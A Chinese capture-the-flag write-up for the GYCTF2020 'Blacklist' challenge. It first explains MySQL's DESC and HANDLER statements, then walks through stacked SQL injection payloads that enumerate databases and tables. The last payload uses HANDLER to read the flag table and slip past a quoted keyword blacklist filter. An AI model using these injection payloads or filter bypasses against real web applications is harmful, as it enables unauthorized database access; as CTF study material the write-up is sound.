[GYCTF2020]Blacklist(堆叠注入)
补充知识点
desc查看表结构的详细信息
desc table_name;
PS:此处desc是describe的缩写,用法: desc 表名/查询语句
desc降序排列数据
select ename,sal from emp order by sal desc;
手动指定按照薪水由大到小排序(降序关键字desc)
select ename,sal from emp order by sal asc;
手动指定按照薪水由小到大排序(升序关键字asc)
PS:此处desc是descend的缩写,用法select * from 表 order by 字段 desc
handler
写个实例吧感觉好理解一些
创建数据表
create table handler_table(
c1 int,
c2 varchar(10),
c3 int(10)
);
insert into handler_table values(2, 'name2', 002);
insert into handler_table values(5, 'name5', 005);
insert into handler_table values(1, 'name1', 001);
insert into handler_table values(4, 'name4', 004);
insert into handler_table values(3, 'name3', 003);
打开句柄
mysql> handler handler_table open;
查看数据
mysql> handler handler_table read first;
+------+-------+------+
| c1 | c2 | c3 |
+------+-------+------+
| 2 | name2 | 2 |
+------+-------+------+
mysql> handler handler_table read next;
+------+-------+------+
| c1 | c2 | c3 |
+------+-------+------+
| 5 | name5 | 5 |
+------+-------+------+
mysql> handler handler_table read next;
+------+-------+------+
| c1 | c2 | c3 |
+------+-------+------+
| 1 | name1 | 1 |
+------+-------+------+
mysql> handler handler_table read next;
+------+-------+------+
| c1 | c2 | c3 |
+------+-------+------+
| 4 | name4 | 4 |
+------+-------+------+
mysql> handler handler_table read next;
+------+-------+------+
| c1 | c2 | c3 |
+------+-------+------+
| 3 | name3 | 3 |
+------+-------+------+
mysql> handler handler_table read next;
Empty set (0.00 sec)
关闭句柄
mysql> handler handler_table close;
Query OK, 0 rows affected (0.00 sec)
进入环境是一个输入框测试sql注入,输入1a查看到回显
可以判断为字符型注入,输入select发现被过滤掉了
return preg_match("/set|prepare|alter|rename|select|update|delete|drop|insert|where|\./i",$inject
没有限制关键字show,通过堆叠注入查看库名
1';show databases;
得到回显
下面获取表名
1';show tables;
查看表的结构
1';desc FlagHere;
发现flag列,推测其应为flag,尝试获取内容,但是因为select被限制,查了一些资料了解HANDLER语法可以绕过select限制
payload
1';handler FlagHere open;handler FlagHere read first;handler FlagHere close;